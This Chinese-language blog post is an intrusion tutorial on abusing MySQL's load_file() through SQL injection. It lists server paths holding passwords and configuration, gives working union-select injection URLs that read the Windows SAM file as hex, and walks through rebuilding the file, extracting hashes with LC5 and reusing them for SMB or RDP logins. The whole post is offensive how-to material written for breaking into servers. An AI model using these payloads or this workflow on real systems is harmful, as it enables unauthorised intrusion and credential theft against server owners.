当前位置:首页 > 技术文章 > 正文内容

load_file()读取SAM值

lcy2009-11-13技术文章1329

MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\my.ini //MYSQL配置文件
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件

等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,

c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码

等敏感文件都在此列。

MYSQL帐号权限足够高的话,理论上load_file()函数可以读取任何文件,只是因为浏览器的编码不能完全显示二进制编码的文件,从而无法 把load_file()出来的二进制文件存储并加以利用。其实这个问题很容易解决,只要用hex()函数把用load_file()函数读出的二进制文 件转为十六进制,就可以把二进制文件以十六进制编码的形式完全显示在网页上。把这些十六进制代码复制下来,用十六进制文件编辑器编辑后另存,就可以得到完 整的二进制文件。

下面用实例加以说明:
目标服务器为win2003系统,存在root权限的注入点,有读取权限。

 

load_file()读取目标服务器c:\windows\repair\sam文件。如果windows系统安装后管理员没有更改密码的话,则有希望得到目标服务器上的windows用户密码。构造

http://www.site.com/mulu/pf.php?id=59/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)),60

,32),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

(注:(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109) 是c:\windows\repair\sam的ASC编码)

得到结果,显示为乱码的sam文件。


这里要说明一下,windows系统把sam文件中的资料进行了加密处理,一般的编辑器是无法直接读取这些信息的,除了乱码什么也看不到。


加上hex()函数后,链接为

http://www.site.com/mulu/pf.php?id=59/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)),6

0,32)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

得到结果为十六进制的sam文件内容。


复制这些十六进制代码,打开十六进制编辑器Hex Workshop,顺序点击文件--新建

 

点击编辑--特殊粘贴


选择CF_TEXT选项,并选中 解释为十六进制字串选项。


点击粘贴,得到如图7所示画面


点击文件--另存为,保存类型为所有文件(图8),就得到了完整的sam文件。


之后用LC5导入得到的sam文件


得到密码HASH。
后续的攻击:
如果对方开启了139/445端口,可以尝试用获得的密码HASH进行SMB攻击。
如果对方开启了3389端口,可以尝试破解获得的密码HASH得到密码远程登陆。

入侵中Load_file()的作用有其局限性,如果能配合各种目录遍历漏洞使用,往往能有奇效。

 

 

版权声明:本文由cy's Blog发布,如需转载请注明出处。

本文链接:http://www.c3389.com/post/94.html

返回列表

上一篇:Unicode详解

下一篇:深入NC提权

相关文章

快速定位目标网站源码

在实战中我们常常面临这样的困境:我们感觉到目标网站采用的是一套开放的源码,但是由站长对页面的修改抹杀了能够直接获取这套源码名称的显性标志。这对我们的破解显然是不利的,我们可能会为了找到源码来研究而疲于...

批处理设置ip和dns

转自:樱木花盗'S Blog@echo offcolor 0aECHO ****************************************************************...

浅析XSS(Cross Site Script)漏洞原理

浅析XSS(Cross Site Script)漏洞原理

作者:茄子宝   2007-07-04      【IT168 专稿】最近一些人频频在博客里炫耀说黑了某某门户网站,发现了某某大站...

Windows XP不能打开chm文件解决方法汇总

如果Windows XP不能打开chm格式的文件,1。如果提示是:如果提示是Internet Explorer 不能链接到您请求的网页或者打开后“页面无法显示”。请下载jjhd...

提权旧曲新歌

 说起WebShell提权的方法网上文章是多得所处可见!那么在这里我写点自己提权时所用到几个小方法!也是自己实战得来的经验!方法如有不对的请大家多多指点!提权时要到的工具如下:cmd.exe...

米拓信息(MetInfo.cn)后台上传漏洞

发布:Bincker发布Site:T00ls.Net米拓信息后台上传漏洞 漏洞描述:看后台上传页面 h t t p : / /localhost/admin/include/upload_file.p...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。